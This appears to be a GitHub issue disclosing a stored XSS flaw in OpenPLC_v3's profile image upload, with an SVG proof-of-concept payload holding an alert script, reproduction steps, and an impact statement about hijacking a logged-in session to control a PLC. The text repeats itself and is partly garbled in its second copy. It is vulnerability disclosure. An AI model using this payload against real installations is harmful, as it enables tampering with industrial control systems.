You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
<?xmlversion="1.0"standalone="no"?>
<!DOCTYPEsvg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svgversion="1.1"baseProfile="full"xmlns="http://www.w3.org/2000/svg">
<polygonid="triangle"points="0,0 0,50 50,0"fill="#009900"stroke="#004400"/>
<scripttype="text/javascript">
alert("XSS by 1d8");
</script>
</svg>
Login > Users > Select a user to edit
Upload the image.svg as the picture
Save changes
Right-click the profile image in upper-right hand corner > Open image in new tab
Our XSS payload is now executed
Impact
Since we can inject our own Javascript, we can abuse the user's logged in cookie to do things such as start/stop the PLC or interact with the Slave devices
The text was updated successfully, but these errors were encountered:
Git: https://github.com/thiagoralves/OpenPLC_v3
Stored XSS Via Profile Image Upload
Reproduction
Use this payload & save it as
image.svg:image.svgas the pictureOur XSS payload is now executed
Impact
Since we can inject our own Javascript, we can abuse the user's logged in cookie to do things such as start/stop the PLC or interact with the Slave devices
The text was updated successfully, but these errors were encountered: